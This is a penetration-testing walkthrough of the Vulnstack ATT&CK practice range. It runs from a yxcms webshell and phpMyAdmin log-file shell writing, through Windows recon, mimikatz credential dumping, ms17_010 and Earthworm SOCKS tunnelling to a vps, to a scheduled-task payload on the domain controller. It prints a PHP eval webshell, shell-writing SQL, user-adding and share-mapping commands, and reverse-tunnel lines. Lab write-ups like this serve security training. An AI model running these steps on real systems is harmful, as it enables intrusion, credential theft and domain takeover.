A Basic Vulnstack Penetration Experience

Range introduction:

This practice series builds a set of ranges modelled on real corporate environments and teaches through a combination of hands-on exercises, video tutorials and blog posts. The range fully simulates an ATT&CK attack chain, from initial access to clean-up, as one closed loop. A realistic APT environment is planned as a follow-up. Various attack routes can be practised in the environment; the author's current route is listed below. All virtual machines share one password: hongrisec@2019

1. Environment construction
   1. Environment build test
   2. Information collection

2. Vulnerability exploitation
   3. Vulnerability search and exploitation
   4. Backend getshell and upload techniques
   5. System information collection
   6. Host password collection

3. Intranet collection
   7. Intranet: continued information collection
   8. Intranet attack: information leakage
   9. Intranet attack: MS08-067
   10. Intranet attack: SMB / remote desktop password guessing
   11. Intranet attack: Oracle database TNS service vulnerability
   12. Intranet attack: RPC DCOM service vulnerability

4. Lateral movement
   13. Other hosts and ports in the intranet: file reading
   14. Other hosts and ports in the intranet: redis
   15. Other hosts and ports in the intranet: redis getshell
   16. Other hosts and ports in the intranet: MySQL database
   17. Other hosts and ports in the intranet: MySQL privilege escalation

5. Building a channel
   18. Other hosts and ports in the intranet: proxy forwarding

6. Persistent control
   19. Domain penetration: domain member information collection
   20. Domain penetration: weak password detection on basic services and deeper use of PowerShell
   21. Domain penetration: lateral movement (WMI)
   22. Domain penetration: C2 command execution
   23. Domain penetration: domain fronting to hide the beacon
   24. Domain penetration: compromising and using the domain controller

7. Trace cleanup
   25. Log cleanup

ATT&CK practice range
File size: 13 GB
File MD5: e16fd0f6a5104aef0dfa73460afff0e8
File SHA1: 078ce02d01298fe40a1feb8260fde79d5fb06bc6

Download link: https://pan.baidu.com/s/1OXB9xW0dv8Rkgz6O7krSUA

Extraction password: svwa




The topology of the whole range:

Web server: Windows 7 (with the phpStudy web environment)
  Simulated external network ip:
  Intranet ip:

Host in the domain: Win2K3 Metasploitable
  Intranet ip:

Domain controller: Windows 2008
  Intranet ip:

The intranet has no route to the external network; only win7 is connected to both the internal and external networks.

Let's start.

First look from the external network
Access the web server (win7) over its simulated external network ip:

It is a yxcms site. The backend path /index.php?r=admin is disclosed in the "Announcement Information" box on the right, so we look up the default yxcms backend credentials and log in:

Login succeeded.

The front-end template function lets php files be edited directly, so we can write a webshell into one of them and connect to it.

We write the webshell into acomment.php.

After saving, we have to find the directory acomment.php lives in, so we scan the site.

The scan turns up many directories, and this cms has directory listing enabled:

Browsing the listing until we find the file we just modified, we can connect to it with a webshell client.

Another route: the web server also runs phpMyAdmin, so we can log in there. This is a target machine, so naturally it has weak credentials (root/root):

The common ways to get a shell from the phpMyAdmin backend are:

1. Write the file directly with select ... into outfile

2. Enable the general query log and write the shell through it

3. Write the shell through the slow query log

4. Write the shell through the error log

5. Abuse the phpMyAdmin 4.8.x local file inclusion vulnerability

First run the following statement:

 show variables like '%secure%';

secure_file_priv shows we have no file-write location, so select into outfile is out. Next, the second method: get a shell through the general_log variable.

We turn on the general query log and point the log file into the web directory:

set global general_log=on;  # enable the log
set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';  # write the log into the website directory

Set successfully.

From now on every statement is appended to hack.php, so executing the following statement writes the webshell into it (PHP ignores the surrounding log text and only executes the <?php ... ?> block):

select '<?php eval($_POST[whoami]); ?>'

Then connect to it with the webshell client.
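As an added example (not part of the original write-up), the statements below put the file-write check and the first three log-based methods from the list above side by side, including the restore steps the write-up skips. They assume the phpStudy web root used above (C:/phpStudy/WWW/yxcms/), an arbitrary POST parameter name (whoami), and a root login, since SET GLOBAL needs the SUPER privilege; the "<value recorded above>" strings are placeholders for the values shown by the SHOW statements.

```sql
-- Added example, not the write-up's own queries. Assumptions: web root
-- C:/phpStudy/WWW/yxcms/, POST parameter 'whoami' chosen arbitrarily, root login
-- (SET GLOBAL requires SUPER).

-- Step 1: where may the server write files?
--   ''    -> anywhere (INTO OUTFILE works)
--   NULL  -> nowhere (INTO OUTFILE is disabled, the case seen in the write-up)
--   path  -> only below that directory
SHOW VARIABLES LIKE 'secure_file_priv';

-- Option 1: direct write, only usable when secure_file_priv is '' or the web root
SELECT '<?php eval($_POST[whoami]); ?>' INTO OUTFILE 'C:/phpStudy/WWW/yxcms/shell.php';

-- Option 2: general query log. Record the current values first so they can be restored.
SHOW VARIABLES LIKE 'general_log%';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/yxcms/hack.php';
-- Every statement from here on is appended to hack.php. The log text around the
-- payload is harmless: PHP only executes what sits inside the <?php ... ?> tags.
SELECT '<?php eval($_POST[whoami]); ?>';
-- Restore, otherwise the file inside the web root keeps growing with every query
SET GLOBAL general_log = 'OFF';
SET GLOBAL general_log_file = '<value recorded above>';   -- placeholder

-- Option 3: slow query log. long_query_time defaults to 10 s, so OR SLEEP(11)
-- pushes the statement, payload included, into the slow log.
SHOW VARIABLES LIKE 'slow_query%';
SET GLOBAL slow_query_log = 'ON';
SET GLOBAL slow_query_log_file = 'C:/phpStudy/WWW/yxcms/slow.php';
SELECT '<?php eval($_POST[whoami]); ?>' OR SLEEP(11);
SET GLOBAL slow_query_log = 'OFF';
SET GLOBAL slow_query_log_file = '<value recorded above>';   -- placeholder
```

The log files are written by the MySQL service account, so the web directory has to be writable by it; on phpStudy, where everything runs as one user, that is the case. Restoring the log settings matters for more than tidiness: phpMyAdmin itself issues queries on every page load, all of which land in the shell file while the log is on.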


Break into the intranet
The shell we just obtained is running as an administrator.

Good. The next step is information collection in preparation for the intranet.

Preliminary collection

ipconfig /all                                   View the local ip configuration and domain (DNS suffix)
route print                                     Print the routing table
net view                                        List other host names in the LAN
arp -a                                          View the arp cache
net start                                       List the running services
net share                                       List the local shares
net share ipc$                                  Create the ipc$ share
net share c$                                    Share the c drive
net use \\192.168.xx.xx\ipc$ "" /user:""        Establish a null session to 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"user name"   Map the c$ share of 192.168.xx.xx with credentials
dir \\192.168.xx.xx\c$\user                     List the files in the user directory on that host's c drive
net config workstation                          Computer name, full name, user name, system version, workstation domain, logon domain
net user                                        List the local users
net user /domain                                List the domain users
net localgroup administrators                   View the local administrators group (domain users often appear here)
net view /domain                                List the domains
net user username /domain                       Details of the specified domain user
net group /domain                               List the groups in the domain (the query is answered by the domain controller)
net group "group name" /domain                  Members of one domain group
net group "domain admins" /domain               The domain administrators
net group "domain computers" /domain            Other host names in the domain
net group "domain controllers" /domain          The domain controllers (there may be more than one)

Routing information:

The key information collected:

The domain name is god.org, the domain controller's machine account is OWA$, the domain administrator is Administrator, and the internal network segment is the 192.168.52.0/24 range swept below. We resolve the domain controller's ip by pinging its name:

ping owa.god.org

The reply gives the domain controller's ip.

Next we create a whoami user on the win7 host and add it to the administrators group.

Then check whether 3389 is listening before trying remote desktop:

netstat -ano | find "3389"

It is listening.

If it is not enabled, turn it on with:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

A remote desktop login as whoami failed anyway. An nmap scan reports 3389 as filtered, so the Windows firewall is blocking it. We therefore bounce a msf shell back and use the enable_rdp post module, which enables the service and adds a firewall exception for Remote Desktop (it does not switch the firewall off).

For realism, the attacking kali box is treated as a host on some other LAN, and frp maps the msf listener onto a public vps so that the "remote" win7 can be controlled:

Generate and upload the payload.

Execute it on win7 and listen on kali.

Session established.

Because the shell already runs as an administrator, privilege escalation is easy.

Run the post/windows/manage/enable_rdp module to open Remote Desktop through the firewall, then connect with rdesktop.

Remote desktop opened. Next, further information collection.

Grab the hashes

hashdump failed, so we use msf's own module for hash dumping:

meterpreter > run post/windows/gather/smart_hashdump

We then upload and run mimikatz (in a real engagement it would need AV evasion).

Elevate privileges first.

Then dump the logon credentials.

This gives the plaintext password of administrator (a domain administrator): Liu78963. On Windows 7 without KB2871997 the WDigest provider keeps logon passwords in LSASS in clear text, which is why mimikatz recovers the plaintext rather than only a hash.

Next we push further into the intranet and go after the other hosts in the domain.

Going further (lateral movement)
Sweep the intranet from win7 for live hosts:

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="   Ping the 192.168.52.0/24 segment; replies containing TTL= are live hosts

One intranet host is found. We add a route to it in msf (through the win7 session) so that msf modules can reach it.

Check whether ms17_010 applies:

It is vulnerable, so we attack.


The attack failed. That is common with the built-in msf ms17_010 exploit against Server 2003: often no session comes back even after several runs, and the eternalblue exploit easily blue-screens 2003. The github script ms17_010_eternalblue_doublepulsar, which covers Windows 2003 through Windows 10, is an alternative. Instead we try to reach the host's remote desktop directly. Because the host sits in the intranet and our attacking machine is effectively on the external network, there is no direct path, so we use Earthworm (ew) as a SOCKS5 proxy into the intranet to reach more hosts.

Start the Earthworm listener on the public vps:

 ./ew_for_linux64 -s rcsocks -l 1080 -e 1234

This adds a relay: port 1234 waits for the reverse connection from the victim, and SOCKS5 requests received on port 1080 are forwarded through that 1234 tunnel. Port 1234 only carries the tunnel traffic.

Upload ew_for_Win.exe to the win7 victim and start a SOCKS5 server on it that connects back to the vps:

ew_for_Win.exe -s rssocks -d 39.1xx.xx9.xx0 -e 1234

Then configure proxychains on kali to use the SOCKS5 listener on port 1080 of the vps:
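The proxychains configuration that matches the two ew commands above, as an added example rather than the write-up's own file. It assumes proxychains-ng on kali (/etc/proxychains4.conf) and uses the vps address exactly as the write-up redacts it; if kali itself were running on the vps, the proxy address would be 127.0.0.1 instead.

```conf
# /etc/proxychains4.conf on kali (added example, not from the original write-up)
# The only chain element is the rcsocks listener started on the vps with
#   ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
# 39.1xx.xx9.xx0 is the vps address as redacted in the write-up (assumption).
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks5 39.1xx.xx9.xx0 1080
```

proxy_dns makes name lookups go through the proxy as well, which matters once intranet host names such as owa.god.org are used from kali; without it, those names would be resolved by kali's own resolver and fail.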

In this way the intranet host win2003 is reachable from kali through the vps. Two separate things are in play here: the route we added in msf lets msf modules reach the other intranet hosts, while the proxychains setup lets the other tools on the attacking machine reach them.

nmap through the proxy shows that 3389 is not open on win2003:

proxychains4 nmap -p 3389 -Pn -sT   # -Pn and -sT are required: proxychains only relays TCP connections, so ICMP/ARP host discovery and raw SYN scans cannot pass through the proxy

We use the auxiliary/admin/smb/ms17_010_command module to execute the command that enables it:

A second scan shows the port open.

Open remote desktop.

My approach here was to add a user first and then use exploit/windows/smb/ms17_010_psexec to get a shell back, since that module wants an administrator account to be specified.

First add a user with auxiliary/admin/smb/ms17_010_command:

And add that user to the administrators group:

Check that the user was added:

Then use exploit/windows/smb/ms17_010_psexec to get a shell back, which finally succeeded after several attempts:

And the session has the highest privilege.

First check which patches are missing:

 run post/windows/gather/enum_patches

Very few patches are installed...

With win2003 in hand, the next step is the domain controller.

Onto the domain controller
The first thought was ms17_010 again, but it failed here too. We already have the domain administrator's password (administrator / Liu78963) from the earlier information collection, so we try remote desktop.

Failure: 3389 is not enabled here either.

Trying to enable it also failed.

That leaves another way: drop a msf payload on the domain controller via win7.

From win7, connect to the domain controller's c$ share with the domain admin credentials:

net use \\\c$ "Liu78963" /user:"administrator"

Use dir to browse the domain controller's files.

Copy shell.exe from the win7 host to the domain controller:

 copy c:\phpstudy\www\yxcms\shell.exe \\\c$

Create a scheduled task on the domain controller that runs the payload once as SYSTEM, which gives us the domain controller shell:

shell schtasks /create /tn "test" /tr C:\shell.exe /sc once /st 18:05 /S /RU System  /u administrator /p "Liu78963"

Two things to watch: the /st time has to lie in the future on the domain controller's clock, and since the intranet has no route to the outside, shell.exe cannot be the same reverse payload that win7 used to reach the vps. It has to connect back to win7 (with a reverse port forward on the win7 session relaying to the listener) or be a bind payload reached through the proxy.

This is a very basic range, well suited for beginners to practise on.


